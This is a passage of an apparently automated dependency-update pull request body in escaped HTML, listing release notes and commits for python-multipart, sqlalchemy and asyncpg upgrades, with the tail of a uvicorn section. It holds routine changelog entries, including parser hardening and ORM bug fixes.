href=\"https://github.com/Kludex/uvicorn/commit/cfd659c4f18b526adce9c255c96707bab20af40c\"\u003e\u003ccode\u003ecfd659c\u003c/code\u003e\u003c/a\u003e Bump pymdown-extensions to 10.21.3 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2958\"\u003e#2958\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.32.1...0.49.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `python-multipart` from 0.0.20 to 0.0.32\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/python-multipart/releases\"\u003epython-multipart's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.0.32\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReplace per-byte partial-boundary scan with rfind lookbehind by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/300\"\u003eKludex/python-multipart#300\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.31...0.0.32\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.31...0.0.32\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.31\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up multipart header parsing and callback dispatch by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/295\"\u003eKludex/python-multipart#295\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBound header field name size before validating by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/296\"\u003eKludex/python-multipart#296\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eValidate Content-Length is non-negative in parse_form by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/297\"\u003eKludex/python-multipart#297\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.30...0.0.31\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.30...0.0.31\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.30\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eTreat only \u003ccode\u003e\u0026amp;\u003c/code\u003e as the urlencoded field separator by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/290\"\u003eKludex/python-multipart#290\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore RFC 2231 extended parameters in \u003ccode\u003eparse_options_header\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/291\"\u003eKludex/python-multipart#291\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.29...0.0.30\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.29...0.0.30\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.29\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e by \u003ca href=\"https://github.com/manunio\"\u003e\u003ccode\u003e@​manunio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/270\"\u003eKludex/python-multipart#270\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.28...0.0.29\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.28...0.0.29\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.28\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary tail scan via \u003ccode\u003ebytes.find\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/281\"\u003eKludex/python-multipart#281\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCap multipart boundary length at 256 bytes by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/282\"\u003eKludex/python-multipart#282\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.27...0.0.28\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.27...0.0.28\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.27\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePass parse offsets via constructors by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/268\"\u003eKludex/python-multipart#268\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd multipart header limits by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/267\"\u003eKludex/python-multipart#267\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.26...0.0.27\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.26...0.0.27\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.26\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSkip preamble before first multipart boundary by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/262\"\u003eKludex/python-multipart#262\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSilently discard epilogue data after the closing boundary by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/259\"\u003eKludex/python-multipart#259\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/python-multipart/blob/main/CHANGELOG.md\"\u003epython-multipart's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.0.32 (2026-06-04)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary scanning for CR/LF-dense part data \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/300\"\u003e#300\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.31 (2026-06-04)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up multipart header parsing and callback dispatch \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/295\"\u003e#295\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eBound header field name size before validating \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/296\"\u003e#296\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eValidate \u003ccode\u003eContent-Length\u003c/code\u003e is non-negative in \u003ccode\u003eparse_form\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/297\"\u003e#297\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.30 (2026-05-31)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eParse \u003ccode\u003eapplication/x-www-form-urlencoded\u003c/code\u003e bodies per the WHATWG URL standard, treating only \u003ccode\u003e\u0026amp;\u003c/code\u003e as a field separator \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/290\"\u003e#290\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eIgnore RFC 2231/5987 extended parameters (\u003ccode\u003ename*\u003c/code\u003e, \u003ccode\u003efilename*\u003c/code\u003e) in \u003ccode\u003eparse_options_header\u003c/code\u003e, keeping the plain parameter authoritative per \u003ca href=\"https://datatracker.ietf.org/doc/html/rfc7578#section-4.2\"\u003eRFC 7578 §4.2\u003c/a\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/291\"\u003e#291\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.29 (2026-05-17)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/270\"\u003e#270\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.28 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary tail scan via \u003ccode\u003ebytes.find\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/281\"\u003e#281\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCap multipart boundary length at 256 bytes \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/282\"\u003e#282\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.27 (2026-04-27)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd multipart header limits \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/267\"\u003e#267\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003ePass parse offsets via constructors \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/268\"\u003e#268\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.26 (2026-04-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSkip preamble before the first multipart boundary more efficiently \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/262\"\u003e#262\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eSilently discard epilogue data after the closing multipart boundary \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/259\"\u003e#259\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.25 (2026-04-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd MIME content type info to \u003ccode\u003eFile\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/143\"\u003e#143\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHandle CTE values case-insensitively \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eRemove custom \u003ccode\u003eFormParser\u003c/code\u003e classes \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/257\"\u003e#257\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eUPLOAD_DELETE_TMP\u003c/code\u003e to \u003ccode\u003eFormParser\u003c/code\u003e config \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/254\"\u003e#254\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eEmit \u003ccode\u003efield_end\u003c/code\u003e for trailing bare field names on finalize \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/230\"\u003e#230\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHandle multipart headers case-insensitively \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/252\"\u003e#252\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eApply Apache-2.0 properly \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/247\"\u003e#247\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.24 (2026-04-05)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eValidate \u003ccode\u003echunk_size\u003c/code\u003e in \u003ccode\u003eparse_form()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/244\"\u003e#244\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.23 (2026-04-05)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/238ead62a0bb6f6cdfe122708faa13812f59f9a6\"\u003e\u003ccode\u003e238ead6\u003c/code\u003e\u003c/a\u003e Version 0.0.32 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/302\"\u003e#302\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/86729796093b04f7cf414ea6c2c4499e2a5750af\"\u003e\u003ccode\u003e8672979\u003c/code\u003e\u003c/a\u003e Replace per-byte partial-boundary scan with rfind lookbehind (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/300\"\u003e#300\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/8190779d8234c8bf8cbed7891c11d4bfb79e84df\"\u003e\u003ccode\u003e8190779\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 7 updates (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/301\"\u003e#301\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/0d3c086d237f6fd20fefe8853e95979276a07c44\"\u003e\u003ccode\u003e0d3c086\u003c/code\u003e\u003c/a\u003e Use uv package ecosystem for Dependabot (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/299\"\u003e#299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/4cffc68a165f7a6f6b7756ce006fabf07a05b7a4\"\u003e\u003ccode\u003e4cffc68\u003c/code\u003e\u003c/a\u003e Version 0.0.31 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/298\"\u003e#298\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/c814948acf509cef7881fa75c969969b19239bbf\"\u003e\u003ccode\u003ec814948\u003c/code\u003e\u003c/a\u003e Reject negative \u003ccode\u003eContent-Length\u003c/code\u003e in \u003ccode\u003eparse_form\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/297\"\u003e#297\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/6b837d47bc68826ed5cbbcb50c6c6a6093444494\"\u003e\u003ccode\u003e6b837d4\u003c/code\u003e\u003c/a\u003e Bound header field name size before validating (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/296\"\u003e#296\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/e0c4f9df2e737d1663fbbdd6563f80613a2089f9\"\u003e\u003ccode\u003ee0c4f9d\u003c/code\u003e\u003c/a\u003e Bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/b8a01bb683e8e8675fdb5d831b206a478c8215aa\"\u003e\u003ccode\u003eb8a01bb\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 3 updates (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/6732164f30c58e28589a1e22213d2f6b8c6bad9f\"\u003e\u003ccode\u003e6732164\u003c/code\u003e\u003c/a\u003e Speed up multipart header parsing and callback dispatch (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.20...0.0.32\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sqlalchemy` from 2.0.49 to 2.0.50\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/releases\"\u003esqlalchemy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.0.50\u003c/h1\u003e\n\u003cp\u003eReleased: May 24, 2026\u003c/p\u003e\n\u003ch2\u003eorm\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.joinedload()\u003c/code\u003e with\n\u003ccode\u003ePropComparator.of_type()\u003c/code\u003e targeting a joined-table subclass combined\nwith \u003ccode\u003ePropComparator.and_()\u003c/code\u003e referencing a column on that subclass\nwould generate invalid SQL, where the subclass column was not adapted to\nthe subquery alias.  Pull request courtesy Joaquin Hui Gomez.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13203\"\u003e#13203\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where the presence of a \u003ccode\u003eSessionEvents.do_orm_execute()\u003c/code\u003e\nevent hook would cause internal execution options such as \u003ccode\u003eyield_per\u003c/code\u003e and\nloader-specific state from the first \u003ccode\u003eorm_pre_session_exec\u003c/code\u003e pass to leak\ninto the second pass, leading to errors when using relationship loaders\nsuch as \u003ccode\u003eselectinload()\u003c/code\u003e and \u003ccode\u003eimmediateload()\u003c/code\u003e.  The execution\noptions passed to the second compilation pass are now based on the original\noptions plus only the explicit updates made via\n\u003ccode\u003eORMExecuteState.update_execution_options()\u003c/code\u003e within the event hook.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13301\"\u003e#13301\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.with_polymorphic()\u003c/code\u003e on a leaf class (a\nsubclass with no further descendants) or a non-inherited class would fail\nwith an \u003ccode\u003eAttributeError\u003c/code\u003e when used in an ORM statement, due to\n\u003ccode\u003e_orm.configure_mappers()\u003c/code\u003e not being triggered implicitly. The fix\nensures that \u003ccode\u003eAliasedInsp\u003c/code\u003e participates in the \u003ccode\u003e_post_inspect\u003c/code\u003e\nhook, triggering mapper configuration during ORM statement compilation.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13319\"\u003e#13319\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esql\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[sql] [bug]\u003c/strong\u003e Fixed issue where floor division (\u003ccode\u003e//\u003c/code\u003e) between a \u003ccode\u003eFloat\u003c/code\u003e or\n\u003ccode\u003eNumeric\u003c/code\u003e numerator and an \u003ccode\u003eInteger\u003c/code\u003e denominator would omit\nthe \u003ccode\u003eFLOOR()\u003c/code\u003e SQL wrapper on dialects where\n\u003ccode\u003eDialect.div_is_floordiv\u003c/code\u003e is \u003ccode\u003eTrue\u003c/code\u003e (the default, including\nPostgreSQL and SQLite).  \u003ccode\u003eFLOOR()\u003c/code\u003e is now applied if either the\ndenominator or the numerator is a non-integer, so that expressions such as\n\u003ccode\u003efloat_col // int_col\u003c/code\u003e render as \u003ccode\u003eFLOOR(float_col / int_col)\u003c/code\u003e instead\nof the incorrect \u003ccode\u003efloat_col / int_col\u003c/code\u003e.  Pull request courtesy r266-tech.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/10528\"\u003e#10528\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003epostgresql\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `asyncpg` from 0.30.0 to 0.31.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/MagicStack/asyncpg/releases\"\u003easyncpg's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.31.0\u003c/h2\u003e\n\u003cp\u003eEnable Python 3.14 with experimental subinterpreter/freethreading\nsupport.\u003c/p\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd Python 3.14 support, experimental subinterpreter/freethreading support (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1279\"\u003e#1279\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/elprans\"\u003e\u003ccode\u003e@​elprans\u003c/code\u003e\u003c/a\u003e in 9e42642b)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAvoid performing type introspection on known types (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1243\"\u003e#1243\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/elprans\"\u003e\u003ccode\u003e@​elprans\u003c/code\u003e\u003c/a\u003e in 5c9986c4)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMake \u003ccode\u003eprepare()\u003c/code\u003e not use named statements by default when cache is disabled (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1245\"\u003e#1245\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/elprans\"\u003e\u003ccode\u003e@​elprans\u003c/code\u003e\u003c/a\u003e in 5b14653e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eImplement connection service file functionality (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1223\"\u003e#1223\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/AndrewJackson2020\"\u003e\u003ccode\u003e@​AndrewJackson2020\u003c/code\u003e\u003c/a\u003e in 1d63bb15)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix multi port connection string issue (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1222\"\u003e#1222\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/AndrewJackson2020\"\u003e\u003ccode\u003e@​AndrewJackson2020\u003c/code\u003e\u003c/a\u003e in 01c0db7b)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAvoid leaking connections if _can_use_connection fails (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1269\"\u003e#1269\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/yuliy-openai\"\u003e\u003ccode\u003e@​yuliy-openai\u003c/code\u003e\u003c/a\u003e in e94302d2)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eOther\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for EOL Python 3.8 (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1281\"\u003e#1281\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/elprans\"\u003e\u003ccode\u003e@​elprans\u003c/code\u003e\u003c/a\u003e in 6c2c4904)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/71775a67277fc0aa5bd2b9f15e848826d7078c4d\"\u003e\u003ccode\u003e71775a6\u003c/code\u003e\u003c/a\u003e asyncpg v0.31.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/508cae6441968ef7613a623fece7083cce66c2b3\"\u003e\u003ccode\u003e508cae6\u003c/code\u003e\u003c/a\u003e Test on PostgreSQL 18 (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1290\"\u003e#1290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/e534e5f15c73525a6509143b3828335517360f1b\"\u003e\u003ccode\u003ee534e5f\u003c/code\u003e\u003c/a\u003e Bump cibuildwheel\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/07fe5122a680f5768e39fc28d68c94b185037a52\"\u003e\u003ccode\u003e07fe512\u003c/code\u003e\u003c/a\u003e Bump pgproto\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/648b35f18199ebf2a30009376a6e9060cf7ad789\"\u003e\u003ccode\u003e648b35f\u003c/code\u003e\u003c/a\u003e Bump Cython to 3.2.1 (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1288\"\u003e#1288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/9e42642b9110d206706697921b6e697a0972649d\"\u003e\u003ccode\u003e9e42642\u003c/code\u003e\u003c/a\u003e Add Python 3.14 support, experimental subinterpreter/freethreading support (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/6fe1c494ef5c3069fa9149c48bf9f8f2cd69f95e\"\u003e\u003ccode\u003e6fe1c49\u003c/code\u003e\u003c/a\u003e Move development deps away from extras and into dependency groups (\u003ca href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1280\"\u003e#1280\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/7a548166c2b23561915c481bd332013e3a415cfb\"\u003e\u003ccode\u003e7a54816\u003c/code\u003e\u003c/a\u003e Fix a couple of missed Python version guards\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/6c2c4904e61b2cd2f502540730a24e246cff2ebd\"\u003e\u003ccode\u003e6c2c490\u003c/code\u003e\u003c/a\u003e Drop support for EOL Python 3.8 (\u003ca 